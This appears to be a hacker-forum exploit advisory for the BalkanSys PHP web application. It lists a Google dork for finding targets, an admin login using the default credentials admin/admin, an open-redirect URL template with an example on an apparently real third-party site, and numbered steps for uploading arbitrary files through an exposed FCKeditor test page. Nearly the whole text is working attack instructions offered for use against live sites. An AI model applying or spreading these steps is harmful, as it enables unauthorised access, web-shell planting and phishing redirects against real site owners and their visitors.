#Title : BalkanSys Multiple Vulnerabilities

#Author : DevilScreaM

#Date : 10/26/2013

#Category : Web Applications

#Type : PHP

#Vendor : http://balkansys.com/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
 	  Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Vulnerabillity : Default Password, Redirection, Arbitrary File Upload

#Dork : inurl:/?act=show_page


Admin Login bypass with Default User password

http://site-target/admin/

Username : admin

Password : admin

============================================================================================

Open Redirection

http://site-target/index.php?act=redirect&bid=1&url=[URL Redirect]

Example :

http://orpheusclub.com/index.php?act=redirect&bid=1&url=http://newbie-security.or.id/

============================================================================================

Arbitrary File Upload (FCKEditor) Special Thanks ReC0ded

http://site-target/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html

1. Change Type From ASP to PHP

2. Select Your File, and Click Send to Server

3. Result Upload at

http://site-target/site_files/UserFiles/[YOUR_FILE].txt